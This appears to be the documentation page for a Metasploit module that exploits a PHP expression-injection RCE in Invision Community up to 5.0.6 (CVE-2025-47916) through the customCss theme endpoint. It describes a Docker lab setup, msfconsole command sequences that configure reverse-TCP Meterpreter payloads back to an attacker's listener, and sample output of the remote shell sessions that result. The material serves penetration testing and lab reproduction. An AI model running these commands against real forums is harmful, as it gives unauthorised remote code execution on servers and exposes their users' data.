ContextQMD
Back to Metasploit Framework

Invision Customcss Rce

documentation/modules/exploit/multi/http/invision_customcss_rce.md

6.4.1313.8 KB
Original Source

Vulnerable Application

This Metasploit module exploits a remote-code injection in Invision Community ≤ 5.0.6 via the theme editor’s customCss endpoint:

  • CVE-2025-47916: malformed {expression="…"} allows evaluation of arbitrary PHP expressions in the content parameter.

To replicate a vulnerable environment

  1. Download the pre-built Docker lab (includes Dockerfile, docker-compose.yml and the IPS 5.0.6 application):
bash
wget https://archive.org/download/ips-5.0.6/IPS-5.0.6.zip -O ips_5.0.6_lab.zip
mkdir ips_5.0.6_lab_dir
unzip ips_5.0.6_lab.zip -d ips_5.0.6_lab_dir
cd ips_5.0.6_lab_dir
  1. Bring up the stack:
bash
docker-compose up -d

  1. Complete the installer by browsing to http://localhost:7777.

    • You do not need a valid license key; you can enter any text and proceed.
    • Use database host db, user ipsuser, password ipspass, database ipsdb.

Verification Steps

  1. Check the installed version:
bash
curl -s http://localhost:7777/admin/install/eula.txt | head -n5

Expected output:

=============================[NOTE]=============================
 Buy license at https://invisioncommunity.com/buy/self-hosted/
================================================================
 IPS 5.0.6 (5000074)
=============================[NOTE]=============================
  1. In msfconsole, confirm the module’s check returns vulnerable:
bash
use exploit/multi/http/invision_customcss_rce
set RHOSTS 127.0.0.1
set TARGETURI /
check

Options

No option

Scenarios

PHP Meterpreter (in-memory)

bash
use exploit/multi/http/invision_customcss_rce
set TARGET 0
set RHOSTS 127.0.0.1
set TARGETURI /
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run

Command Shell (ARCH_CMD)

bash
use exploit/multi/http/invision_customcss_rce
set TARGET 1
set RHOSTS 127.0.0.1
set TARGETURI /
set payload cmd/linux/http/x64/meterpreter_reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run

Expected Results

With php/meterpreter/reverse_tcp:

plaintext
msf exploit(multi/http/invision_customcss_rce) > run http://localhost:7777
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected IPS version: 5.0.6
[+] The target is vulnerable. IPS version 5.0.6 is vulnerable (≤ 5.0.6)
[*] Sending exploit to 127.0.0.1:7777 ...
[*] Sending stage (40004 bytes) to 172.30.0.3
[*] Meterpreter session 9 opened (192.168.1.36:4444 -> 172.30.0.3:34414) at 2025-05-20 18:13:55 +0200
[*] Session 9 created in the background.
msf exploit(multi/http/invision_customcss_rce) > sessions 9
[*] Starting interaction with 9...

meterpreter > sysinfo
Computer    : 01ed59644450
OS          : Linux 01ed59644450 6.14.6-2-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 10 May 2025 20:09:10 +0000 x86_64
Meterpreter : php/linux

With cmd/linux/http/x64/meterpreter_reverse_tcp:

plaintext
msf exploit(multi/http/invision_customcss_rce) > run http://localhost:7777
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected IPS version: 5.0.6
[+] The target is vulnerable. IPS version 5.0.6 is vulnerable (≤ 5.0.6)
[*] Sending exploit to 127.0.0.1:7777 ...
[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 172.30.0.3:46552) at 2025-05-20 18:11:35 +0200
[*] Session 7 created in the background.
msf exploit(multi/http/invision_customcss_rce) > sessions 7
[*] Starting interaction with 7...

meterpreter > sysinfo
Computer     : 172.30.0.3
OS           : Debian 12.10 (Linux 6.14.6-2-cachyos)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >